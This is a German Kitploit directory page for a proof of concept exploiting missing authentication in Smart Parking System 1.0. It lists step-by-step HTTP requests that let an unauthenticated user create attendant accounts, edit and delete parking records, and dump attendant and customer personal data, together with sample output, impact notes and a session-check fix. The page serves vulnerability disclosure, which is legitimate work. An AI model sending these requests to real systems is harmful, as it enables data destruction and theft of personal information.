Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/xmyronn/cve-2026-10243-auth
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierung
GitHubxmyronn/cve-2026-10243-auth

CVE-2026-10243-AUTH

Proof of Concept, der den nicht authentifizierten Zugriff auf kritische Admin-Funktionen im Smart Parking System 1.0 demonstriert und die Erstellung von Konten, Datenmanipulation sowie die Offenlegung personenbezogener Daten (PII) ermöglicht.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Smart Parking System 1.0 – Nicht authentifizierter Zugriff auf kritische Admin-Funktionen

Informationen zur Schwachstelle

FeldDetails
ProduktSmart Parking System
Anbietercode-projects.org
Version1.0
SchwachstellenklasseFehlende Authentifizierung für kritische Funktionen (CWE-306)
CVE-IDAusstehend
CVSS-Score9.8 Kritisch (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Erforderliche AuthentifizierungKeine
Betroffene Dateienattendant.php, edit.php, basic_table.php, basic_table2.php, admin_request.php

Beschreibung

Das Smart Parking System 1.0 von code-projects.org setzt keine Authentifizierung für mehrere Admin-Endpunkte durch. Ein nicht authentifizierter Remote-Angreifer kann diese Endpunkte direkt ohne Session-Cookie aufrufen und privilegierte Operationen ausführen, darunter das Erstellen von Attendant-Konten, das Bearbeiten und Löschen von Parkdatensätzen sowie das Anzeigen aller Kundendaten (PII) und Buchungsdaten.

Für die Ausnutzung dieser Schwachstelle sind keine Anmeldedaten, kein Session-Token und keine Interaktion eines legitimen Benutzers erforderlich.


Übersicht der Angriffskette

root@kitploit:~
Keine Anmeldedaten / keine Session
        ↓
Direkte GET-Anfrage an Admin-Endpunkte
        ↓
attendant.php     → Erstellen von Schatten-Attendant-Konten
edit.php          → Lesen und Überschreiben beliebiger Parkdatensätze
basic_table.php   → Löschen beliebiger Parkdatensätze
basic_table2.php  → Auslesen aller Attendant-PII
admin_request.php → Auslesen aller Kunden-E-Mails und Buchungsdaten
        ↓
Vollständige Admin-Funktionalität kompromittiert

Schritt-für-Schritt-Proof-of-Concept

Schritt 1 – Nicht authentifizierten Zustand bestätigen

Öffnen Sie eine neue Browser-Sitzung ohne Cookies. Navigieren Sie zum Anwendungsstammverzeichnis. Die Anmeldeseite wird angezeigt, was bestätigt, dass keine aktive Sitzung besteht:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/ HTTP/1.1
Host: 192.168.0.9

Schritt 2 – Zugriff auf das Attendant-Erstellungspanel (ohne Authentifizierung)

Navigieren Sie direkt zum Attendant-Registrierungsendpunkt:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/attendant.php HTTP/1.1
Host: 192.168.0.9

Ergebnis: Das vollständige Formular „Add Parking Attendant Details" wird mit Feldern für Vorname, Nachname, Mobilnummer, Straße, Benutzername und Passwort geladen. Ein Angreifer kann ein Schatten-Attendant-Konto mit Systemzugriff registrieren.


Schritt 3 – Parkdatensätze lesen und ändern (ohne Authentifizierung)

Navigieren Sie direkt zum Bearbeitungsendpunkt für Parkdatensätze:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//edit.php?edit=5 HTTP/1.1
Host: 192.168.0.9

Ergebnis: Das Formular „Update Parkings Details" wird mit Live-Datenbankwerten vorausgefüllt geladen:

root@kitploit:~
City:   Mombasa
Street: Tudor
Slots:  150
Cost:   500

Ein Angreifer kann jedes Feld überschreiben und absenden, um Änderungen direkt in der Datenbank zu speichern.


Schritt 4 – Parkdatensatz löschen (ohne Authentifizierung)

Senden Sie eine direkte GET-Anfrage an den Lösch-Endpunkt:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/basic_table.php?delete=4 HTTP/1.1
Host: 192.168.0.9

Ergebnis: Die Anwendung antwortet mit:

root@kitploit:~
Parking deleted successfully

Der Datensatz wird dauerhaft in der Datenbank gelöscht. Es sind keine Authentifizierung, kein CSRF-Token und keine Bestätigungsabfrage erforderlich.


Schritt 5 – Alle Park-Attendants auslesen (ohne Authentifizierung)

Navigieren Sie direkt zum Attendant-Listen-Endpunkt:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//basic_table2.php HTTP/1.1
Host: 192.168.0.9

Ergebnis: Die vollständige Attendant-Liste wird zurückgegeben, einschließlich Namen, Mobilnummern und zugewiesener Straßen:

root@kitploit:~
karis  kelvin  070824555  msa
king   doshi   0708009360 Nairobi
james  peter   0708009360 vol
tset   test    0708009360 tset

Schritt 6 – Alle Kundenbuchungsdaten auslesen (ohne Authentifizierung)

Navigieren Sie direkt zum Admin-Buchungsanfragen-Endpunkt:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//admin_request.php HTTP/1.1
Host: 192.168.0.9

Ergebnis: Alle Kundenbuchungsdatensätze werden zurückgegeben, einschließlich E-Mails, Parkplätzen, Stunden und Kosten:

root@kitploit:~
[email protected]   slots:4  hours:2  cost:4000  status:requested
[email protected]   slots:1  hours:6  cost:1200  status:Completed
[email protected]    slots:1  hours:2  cost:1000  status:requested
[email protected]       slots:1  hours:1  cost:500   status:requested
[email protected]        slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:3  cost:0     status:requested
[email protected]       slots:1  hours:2  cost:1000  status:requested

Auswirkungen

  • Vollständiger Admin-Panel-Zugriff – alle privilegierten Funktionen ohne Anmeldedaten erreichbar
  • Datenvernichtung – beliebige Parkdatensätze können dauerhaft gelöscht werden
  • Datenmanipulation – beliebige Parkdatensätze können geändert werden
  • Privilegienerweiterung – Schatten-Attendant-Konten mit Systemanmeldung erstellbar
  • Offenlegung personenbezogener Daten (PII) – alle Kunden-E-Mails und Buchungshistorien werden abgegriffen
  • Attendant-Datenleck – vollständige Liste einschließlich Namen und Telefonnummern offengelegt

Zusammenfassung der betroffenen Dateien

DateiSchwachstelle
attendant.phpNicht authentifizierte Erstellung von Attendant-Konten
edit.phpNicht authentifizierter Lese-/Schreibzugriff auf Parkdatensätze
basic_table.phpNicht authentifiziertes Löschen von Parkdatensätzen
basic_table2.phpNicht authentifizierter Zugriff auf vollständige Attendant-PII
admin_request.phpNicht authentifizierter Zugriff auf alle Kundenbuchungsdaten

Behebung

Fügen Sie am Anfang jeder Admin-zugewandten PHP-Datei eine Session-Authentifizierungsprüfung hinzu:

root@kitploit:~
session_start();
if (!isset($_SESSION['admin']) || $_SESSION['admin'] !== true) {
    header("Location: index.php");
    exit();
}

Referenzen

  • Anbieter-Startseite
  • CWE-306: Missing Authentication for Critical Function
  • OWASP: Broken Access Control

Entdecker

  • Forscher: Imad Alvi
Tool herunterladen